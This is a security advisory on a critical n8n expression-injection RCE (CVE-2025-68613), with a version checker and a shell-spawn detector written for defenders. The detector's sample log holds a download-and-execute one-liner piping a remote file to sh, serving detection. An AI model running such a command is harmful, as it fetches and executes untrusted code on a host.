Critical RCE Flaw in n8n Puts 103,000+ Workflow Automation Servers at Risk

Critical RCE Vulnerability (CVE-2025-68613) in n8n Platform Allows Full Server Compromise

CRITICAL
December 27, 2025
4m read
Vulnerability | Cloud Security | Patch Management

Impact Scope

People Affected

Users of over 103,000 exposed instances

Industries Affected

Technology, Other

Related Entities

CVE Identifiers

CVE-2025-68613
CRITICAL
CVSS:9.9

Full Report

Executive Summary

A critical vulnerability, CVE-2025-68613, has been discovered in the popular open-source workflow automation platform n8n. Rated 9.9 on the CVSS scale, this flaw allows for remote code execution (RCE) and affects an estimated 103,000 publicly exposed instances. The vulnerability can be exploited by any authenticated user with permissions to create or edit workflows, a common privilege level. Successful exploitation allows an attacker to execute arbitrary operating system commands, leading to a complete compromise of the host server. Given that n8n is often used as a central hub for connecting sensitive APIs and services, this vulnerability poses a severe risk of data theft and lateral movement across an organization's infrastructure. Administrators are strongly advised to update to a patched version immediately.

Vulnerability Details

The vulnerability is an expression injection flaw in the way n8n evaluates workflow expressions, the {{ ... }} snippets embedded in node parameters and resolved at run time. The sandbox that is supposed to confine that evaluation is insufficient: an authenticated user who can create or edit workflows can craft an expression that escapes it and runs arbitrary commands on the underlying operating system with the privileges of the n8n process. This is a classic RCE scenario, turning limited application access into full control of the server.

An attack would involve the following steps:

  1. The attacker obtains an authenticated account on the n8n instance that can create or edit workflows. No administrative role is needed; ordinary member accounts commonly hold this permission.
  2. The attacker creates or modifies a workflow, embedding a specially crafted expression in one of its node parameters.
  3. When the workflow runs, the malicious expression is evaluated, escapes the sandbox, and executes OS commands on the server as the n8n process user.

Affected Systems

The vulnerability impacts a wide range of n8n versions:

  • All versions from 0.211.0 up to, but not including, the patched versions.

Patched versions that resolve this vulnerability are:

  • 1.120.4
  • 1.121.1
  • 1.122.0

Any self-hosted n8n instance within the vulnerable version range is at risk, particularly the more than 103,000 instances identified as being publicly accessible on the internet.
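The version ranges above are easy to misread by hand (1.121.0 is newer than 1.120.4 yet still vulnerable), so the following added example, which is not code from the article or from the n8n project, encodes them as a checker you can run over an inventory. The boundaries are taken from the advisory text (affected from 0.211.0; fixed in 1.120.4, 1.121.1 and 1.122.0); the inventory at the bottom is constructed, and the host names are made up. Version strings can come from `n8n --version` on each host.

```python
"""Classify n8n version strings against the CVE-2025-68613 ranges.

Added example, not from the article or the n8n project. The boundaries
come from the advisory text: affected from 0.211.0, fixed in 1.120.4,
1.121.1 and 1.122.0. The inventory at the bottom is constructed.
"""
import re

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)([-+][0-9A-Za-z.-]+)?$")

# Sort keys are (major, minor, patch, release_flag). A pre-release such as
# 1.120.4-rc.1 gets flag 0 so it sorts just below the final 1.120.4 (flag 1),
# which is how semver orders it.
FIRST_AFFECTED = (0, 211, 0, 0)                    # conservatively includes any 0.211.0 pre-release
FIXED = {(1, 120): (1, 120, 4, 1), (1, 121): (1, 121, 1, 1)}  # first safe release per branch
FIRST_CLEAN = (1, 122, 0, 1)                       # every release from here on is patched


def version_key(text):
    """Parse '1.120.3', 'v1.121.0' or '1.122.0-rc.1' into a sortable tuple."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"not an n8n version string: {text!r}")
    major, minor, patch, suffix = m.groups()
    prerelease = bool(suffix) and suffix.startswith("-")
    return (int(major), int(minor), int(patch), 0 if prerelease else 1)


def is_vulnerable(text):
    """True if the version falls inside the advisory's affected range."""
    v = version_key(text)
    if v < FIRST_AFFECTED:
        return False                 # predates the affected range named in the advisory
    branch = v[:2]
    if branch in FIXED:
        return v < FIXED[branch]     # 1.120.x and 1.121.x each have a backported fix
    if branch >= FIRST_CLEAN[:2]:
        return v < FIRST_CLEAN       # only a 1.122.0 pre-release lands here
    return True                      # any other branch from 0.211.0 up has no fix


def triage(inventory):
    """inventory: {host: version string}. Returns (vulnerable hosts, unparseable hosts)."""
    vulnerable, unparseable = [], []
    for host, version in inventory.items():
        try:
            if is_vulnerable(version):
                vulnerable.append(host)
        except ValueError:
            unparseable.append(host)  # e.g. 'latest' from a compose file; go look at the real binary
    return sorted(vulnerable), sorted(unparseable)


# Constructed inventory, as you might collect it from `n8n --version` on each host.
SAMPLE_INVENTORY = {
    "automation-01": "1.120.3",
    "automation-02": "1.120.4",
    "automation-03": "1.121.0",
    "legacy-n8n": "0.236.3",
    "dev-n8n": "1.122.1",
    "unknown": "latest",
}

if __name__ == "__main__":
    vuln, bad = triage(SAMPLE_INVENTORY)
    print("patch now:", vuln)
    print("could not classify:", bad)
```

Treat an unparseable entry as unknown rather than safe: an image tag like "latest" says nothing about what is actually running until you query the binary or the UI.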

Exploitation Status

As of December 26, 2025, there were no public reports of this vulnerability being actively exploited in the wild. However, due to the critical severity, the large number of exposed instances, and the relative ease of exploitation for an authenticated attacker, the potential for widespread attacks is high. Security researchers anticipate that threat actors will quickly develop and deploy exploits targeting this flaw.

Impact Assessment

A successful exploit of CVE-2025-68613 can have devastating consequences. Since n8n workflows often store credentials, API keys, and access tokens for various services (databases, cloud platforms, SaaS applications), an attacker compromising the n8n server can exfiltrate this sensitive data. This enables Credential Access (TA0006) on a massive scale. With this access, the attacker can:

  • Steal, modify, or delete data from connected systems.
  • Manipulate business processes by altering automation logic.
  • Use the compromised n8n server as a beachhead to pivot and move laterally within the victim's network (T1021 - Remote Services).
  • Deploy additional malware, such as ransomware or cryptominers, on the server.

Detection & Response

  1. Version Scanning: The first step is to identify all n8n instances in your environment and check their version numbers against the list of affected versions.
  2. Audit Workflow Permissions: Review all user accounts and roles within n8n. Identify all users who have permissions to create or edit workflows. This list represents potential internal or compromised-account threats.
  3. Log Monitoring: Monitor n8n application logs and server logs for suspicious activity. Look for unexpected processes spawned by the n8n service (e.g., sh, bash, powershell.exe); a shell appearing under the n8n process is a key indicator of a successful exploit. This aligns with D3-PSA: Process Spawn Analysis.
  4. Network Analysis: Monitor outbound network traffic from the n8n server for connections to unusual IP addresses or ports, which could indicate a reverse shell or data exfiltration channel. This is covered by D3-OTF: Outbound Traffic Filtering.
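Steps 3 and 4 come down to one question: did a shell appear underneath the n8n process? The following added example, which is not code from the article or from the n8n project, answers it over a process-creation event feed. The feed format (one JSON object per line with ts, pid, ppid, comm and cmdline) is a simplification I chose for the example; map your EDR, auditd or Sysmon fields onto it. The sample events, including the 198.51.100.7 download address, are constructed. One caveat a practitioner needs: n8n's own Execute Command node legitimately spawns a shell, so on an instance whose workflows use that node you must baseline or allow-list those, or disable the node so that any shell spawn is anomalous.

```python
"""Flag shell interpreters spawned under the n8n process tree.

Added example, not from the article or the n8n project. It works on a
constructed, simplified process-creation event feed (one JSON object per
line with ts, pid, ppid, comm, cmdline); map your EDR, auditd or Sysmon
fields onto these keys. The sample events and the 198.51.100.7 address
below are made up for the example.
"""
import json

SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh"}

# Constructed sample feed: the n8n main process, one workflow-triggered shell
# running a download-and-execute one-liner (plus its children), and an
# unrelated interactive admin shell that must not be flagged.
SAMPLE_EVENTS = """\
{"ts": "2025-12-27T10:00:01Z", "pid": 1000, "ppid": 1, "comm": "node", "cmdline": "node /usr/local/lib/node_modules/n8n/bin/n8n start"}
{"ts": "2025-12-27T10:05:12Z", "pid": 1301, "ppid": 1000, "comm": "sh", "cmdline": "sh -c curl -s http://198.51.100.7/x | sh"}
{"ts": "2025-12-27T10:05:12Z", "pid": 1302, "ppid": 1301, "comm": "curl", "cmdline": "curl -s http://198.51.100.7/x"}
{"ts": "2025-12-27T10:05:13Z", "pid": 1303, "ppid": 1301, "comm": "sh", "cmdline": "sh"}
{"ts": "2025-12-27T10:06:00Z", "pid": 2000, "ppid": 1, "comm": "bash", "cmdline": "bash -l"}
{"ts": "2025-12-27T10:06:30Z", "pid": 2001, "ppid": 2000, "comm": "ls", "cmdline": "ls -la /opt"}
"""


def is_n8n(ev):
    """Heuristic identity check for the n8n server process (assumed layout)."""
    return ev["comm"] == "node" and "/n8n" in ev["cmdline"]


def lineage(ev, by_pid):
    """Walk ppid links upward; returns the ancestor chain, nearest first."""
    chain, seen = [], set()
    parent = by_pid.get(ev["ppid"])
    while parent and parent["pid"] not in seen:
        chain.append(parent)
        seen.add(parent["pid"])
        parent = by_pid.get(parent["ppid"])
    return chain


def shell_spawn_alerts(lines):
    """One alert per shell whose ancestry leads back to the n8n process.

    Walking the full lineage (not just the direct parent) catches shells
    reached through a helper process. A shell spawned by a shell that is
    itself below n8n (pid 1303 above) is not reported again, because its
    parent's alert already covers it; shells above n8n in the tree (the
    service manager that started n8n) are ignored for that purpose.
    """
    events = [json.loads(line) for line in lines if line.strip()]
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        if ev["comm"] not in SHELLS:
            continue
        chain = lineage(ev, by_pid)
        n8n_idx = next((i for i, a in enumerate(chain) if is_n8n(a)), None)
        if n8n_idx is None:
            continue                                  # not under n8n at all
        if any(a["comm"] in SHELLS for a in chain[:n8n_idx]):
            continue                                  # nested shell, parent already alerted
        alerts.append({
            "ts": ev["ts"],
            "pid": ev["pid"],
            "cmdline": ev["cmdline"],
            "parent_chain": [a["cmdline"] for a in chain[: n8n_idx + 1]],
        })
    return alerts


if __name__ == "__main__":
    for a in shell_spawn_alerts(SAMPLE_EVENTS.splitlines()):
        print(f"ALERT {a['ts']} pid={a['pid']} {a['cmdline']!r} via {a['parent_chain']}")
```

The alert carries the parent chain so an analyst can immediately see that the shell descends from n8n rather than from an operator's session; pairing the hit with the outbound connection from the same process tree (step 4) is what turns it into a confirmed incident.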

Mitigation

  1. Upgrade Immediately: The primary and most effective mitigation is to upgrade all n8n instances to a patched version (1.120.4, 1.121.1, 1.122.0 or later). This directly remediates the vulnerability. This is a direct application of D3-SU: Software Update.
  2. Restrict Permissions (Temporary Mitigation): If patching is not immediately possible, as a temporary measure, restrict permissions for creating and editing workflows to only highly trusted, senior administrators. This reduces the attack surface but does not fix the underlying flaw. This is a form of D3-UAP: User Account Permissions.
  3. Harden the Environment: Run the n8n process as a non-root user with minimal privileges. Containerize the application (e.g., using Docker) and apply security contexts to limit its capabilities. This will not prevent exploitation but can limit the post-exploitation impact.
  4. Network Isolation: Restrict network access to the n8n instance. If it does not need to be public, place it behind a VPN. Use firewall rules to limit outbound connectivity from the n8n server to only known, required endpoints.

Timeline of Events

December 27, 2025: This article was published.

MITRE ATT&CK Mitigations

  • Upgrade to a patched version of n8n to eliminate the vulnerability.
  • Run n8n in a containerized and hardened environment to limit the impact of a potential compromise.
  • Restrict workflow creation and editing permissions to only trusted administrators as a temporary mitigation.
  • Limit network access to the n8n instance and restrict its outbound connections to only necessary endpoints.

D3FEND Defensive Countermeasures

The definitive countermeasure for CVE-2025-68613 is to immediately upgrade all n8n instances to a patched version (1.120.4, 1.121.1, 1.122.0, or newer). Given the 9.9 CVSS score and the low-privilege authenticated attack vector, this should be treated as an emergency change. Use asset inventory systems to identify all n8n deployments, including shadow IT instances. Prioritize patching for internet-facing servers and those connected to sensitive data sources or critical applications. After patching, verify the update was successful by checking the version in the n8n UI or via the command line. This action completely removes the expression injection vulnerability, providing the most effective protection.

As a temporary compensating control if patching is delayed, conduct an immediate audit of all user permissions within the n8n platform. Revoke the ability to create or edit workflows from all non-essential users. This permission should be restricted to a very small group of highly trusted administrators. This action significantly reduces the attack surface by limiting the number of accounts that could be used to inject a malicious expression. While this does not fix the underlying RCE vulnerability, it makes exploitation much more difficult by raising the bar for the attacker from compromising any user account to compromising a privileged administrator account. This should be paired with enhanced monitoring of administrator activity.

Configure EDR and server logging to monitor for anomalous child processes spawned by the main n8n process. Outside of workflows that deliberately use n8n's Execute Command node, the n8n application has no reason to launch system shells like bash, sh, cmd.exe, or powershell.exe; if no workflow needs that node, disable it (n8n's NODES_EXCLUDE setting does this) so that any shell spawn becomes anomalous by definition. Create high-priority alerts in your SIEM or security monitoring platform to trigger an immediate investigation if the n8n process spawns any of these interpreters. This is a high-fidelity indicator of a successful RCE exploit. The alert should trigger an automated response to isolate the host server from the network to prevent lateral movement or data exfiltration while the incident is investigated. This detection-in-depth approach provides a critical safety net to catch exploitation attempts that bypass other preventative controls.

Sources & References

n8n RCE Hits 103K
eSecurity Planet (esecurityplanet.com) December 26, 2025
Weekly Threat Landscape Digest - Week 52
Hawkeye Forensics (hawkeyeforensics.com) December 26, 2025
[CIVN-2025-0390] Remote Code Execution vulnerability in n8n (npm)
Team Cymru (teamwinglobal.com) December 26, 2025

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis | Security Orchestration (SOAR/XSOAR) | Incident Response & Digital Forensics | Security Operations Center (SOC) | SIEM & Security Analytics | Cyber Fusion & Threat Sharing | Security Automation & Integration | Managed Detection & Response (MDR)

Tags

n8n | RCE | Vulnerability | Workflow Automation | Expression Injection | CVSS 9.9
